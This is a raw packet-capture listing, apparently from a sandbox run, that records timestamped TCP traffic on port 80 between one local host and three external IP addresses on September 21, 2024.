Sep 21, 2024 14:48:09.797643900 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.797652006 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.797663927 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.797673941 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.797683954 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.797688961 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.797709942 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.797720909 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.797730923 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.797732115 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.797741890 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.797744989 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.797744036 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.797765970 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.797789097 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.798080921 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798131943 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.798238993 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798250914 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798259974 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798275948 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798286915 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798295975 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.798296928 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798309088 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798319101 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798330069 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798332930 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.798342943 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798373938 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.798804998 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.798815966 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798825979 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798836946 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798837900 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.798849106 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798858881 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798866987 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.798868895 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.798870087 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798882961 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798893929 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798896074 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.798904896 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798916101 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798926115 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798930883 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.798938990 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798949957 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.798949957 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798962116 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798974037 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.798979044 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.799005032 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.799029112 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.799396992 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.799407005 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.799431086 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.799442053 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.799452066 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.799452066 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.799463987 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.799474001 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.799490929 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.799518108 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.799537897 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.816387892 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.816400051 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.816411018 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.816477060 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.816488028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.816498995 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.816546917 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.816751957 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.819736958 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.819776058 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.819786072 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.819822073 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.819895029 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.840240955 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.840306997 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.840306044 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.840368032 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.841512918 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841523886 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841536045 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841573954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841579914 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.841586113 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841598034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841598034 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.841651917 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.841722965 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841733932 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841746092 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841769934 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.841809034 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.841878891 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841890097 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841900110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841911077 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841921091 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841924906 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.841932058 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841945887 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841957092 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.841976881 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842017889 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842032909 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842044115 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842068911 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842080116 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842089891 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842098951 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842102051 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842116117 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842123985 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842149973 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842170000 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842350006 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842360973 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842371941 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842384100 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842402935 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842436075 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842526913 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842545986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842555046 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842560053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842564106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842569113 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842572927 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842575073 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842581034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842586040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842592001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842672110 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842793941 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842804909 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842814922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842824936 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842849016 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842884064 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842916012 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842927933 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842938900 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842950106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842962027 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842968941 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.842973948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842984915 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.842997074 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843005896 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843008041 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843019962 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843043089 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843069077 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843239069 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843311071 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843379021 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843394995 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843406916 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843416929 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843427896 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843429089 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843441010 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843451977 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843455076 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843462944 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843473911 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843485117 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843497038 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843523026 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843699932 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843753099 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843823910 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843835115 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843844891 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843854904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843863964 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843868971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843873978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843874931 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843885899 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843890905 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843897104 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843897104 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843909979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.843950033 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.843974113 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.844280005 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844290972 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844301939 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844312906 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844317913 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844322920 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844327927 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844330072 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.844333887 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844352007 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844363928 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844373941 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844383955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844386101 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.844396114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844405890 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844415903 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844427109 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844436884 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844439983 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.844449043 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.844486952 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.844511032 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.845083952 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845094919 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845103979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845114946 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845125914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845134974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845145941 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.845146894 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845166922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845177889 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845189095 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845191002 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.845202923 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845212936 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845216036 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.845223904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845233917 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845243931 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845243931 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.845253944 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845264912 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845277071 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.845280886 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845295906 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845309019 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845312119 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.845323086 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845345020 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845351934 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.845356941 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845369101 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.845376968 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.845412970 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.846081018 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.846091986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.846101046 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846113920 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846124887 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846129894 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846134901 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846138954 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846139908 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.846144915 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846157074 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846168041 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846177101 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846182108 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.846188068 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846206903 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846218109 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846225023 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.846230030 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846241951 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846252918 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.846277952 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.846302032 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.846656084 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846667051 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846678019 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846688032 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846698999 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846704960 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.846710920 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846723080 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846734047 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846745014 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846749067 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.846756935 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846770048 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.846781969 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.846807957 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.846997976 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847008944 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847018957 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847029924 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847038984 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.847040892 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847053051 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847065926 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847075939 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847084045 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.847088099 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847099066 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847110033 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847126007 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.847150087 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.847232103 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847280979 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847292900 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847306013 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.847343922 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.847408056 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847418070 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847429037 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847441912 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847453117 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.847481966 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.847513914 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847526073 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847536087 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847548962 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.847558975 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.847585917 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.847620010 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.848196030 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.848256111 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.848261118 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.848272085 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.848304987 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.848330021 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.848351002 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.848366022 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.848376036 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.848387957 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.848393917 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.848427057 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.848545074 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.848557949 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.848567963 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.848581076 CEST	80	49709	147.45.44.104	192.168.2.9
